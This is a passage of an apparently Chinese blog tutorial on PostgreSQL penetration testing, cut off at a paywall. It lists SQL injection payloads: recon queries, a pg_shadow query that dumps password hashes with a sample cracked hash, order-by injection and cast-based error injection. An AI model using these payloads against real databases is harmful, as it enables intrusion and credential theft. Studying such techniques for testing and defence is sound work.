这篇博客介绍了PostgreSQL数据库的基础知识,包括其与MySQL的对比,SQL注入技巧如order by、报错盲注和时间盲注,还讨论了PostgreSQL的特殊特性如||连接符、like特性和命令执行函数。同时,文中提到了一些安全隐患,如CVE-2019-9193,并分享了Linux低版本的命令执行方法。
一、PostgreSQL简介:
PostgreSQL数据库大家肯定又陌生又熟悉,偶尔会出现在各大渗透测试文章里SQL注入相关的部分,但是存在感又远远不如oracle、mssql和mysql。
简单对这几种数据库进行对比
Oracle:闭源,商用收费,功能性能都很强大,而且跨平台使用,但是操作运维麻烦
mssql:闭源,商用收费,性能较好,不能跨平台(linux版本没啥人用)运维比较简单
mysql:开源,免费,灵活,而且现在已经被oracle公司收购了,性能比较一般
PostgreSQL:开源,免费,灵活,性能较好。
那其实通过上面简单的介绍,可以看出这四种关系型数据库oracle和mssql是类似的;而mysql和PostgreSQL也是类似的,那么为什么mysql那么多人用而PostgreSQL没人用呢?实际上不是因为PostgreSQL不够优秀,而是因为mysql早期的推广太好了,在PHP风靡的时代,几乎全部都是搭配的MYSQL,因此就冷落了PostgreSQL,从而导致一直没有比较成熟的相关产品;并且因为没有背靠公司,所以用的人就比较少。
默认端口为5432
PostgreSQL和MYSQL的使用方法是非常像的
搭建的环境postgresql-10.20-1-windows-x64
小Tips:
1、postgresql默认情况下除本机外的机器是不能连接的,要想连接需要配置一下文件pg_hba.conf,因此就算拿到了账户密码也不一定登录的上
2、postgresql默认是支持堆叠的,因为支持堆叠,所以在有时候可以直接通过sql注入拿下网站
二、注入基础-简单命令
这一部分命令就去网上抄抄写写了
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
SELECT CURRENT_SCHEMA(); //查看当前权限
public
SELECT version(); //查看版本
PostgreSQL 10.20, compiled by Visual C++ build 1800, 64-bit
SELECT current_database() //查看当前数据库
PostgreSQLdb
select * from information_schema.SCHEMATA; //pgsql也和mysql一样有information_schema这个库
select usename, passwd from pg_shadow; //获取pgsql账户和密码
"postgres" "md5ea413b4fad53ddb9cb293199bdc88034"
这个密码的hash是a123456.postgres即 md5(passwd+username)
select datname from pg_database; // 获取所有的库
select array_to_string(array_agg(datname),',') from pg_database; // 获取所有的库
order by
postgresql支持和mysql语法一样的order by 注入
select * from table_name from column_name = 'xxx' order by 3
报错盲注
**1、cast **
将一种格式转为另外一种格式
select '1' and 1=cast(version() as int);
2、::运算符
也是将一种格式转为另外一种格式
select version()::
最低0.47元/天 解锁文章
扫一扫
308
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
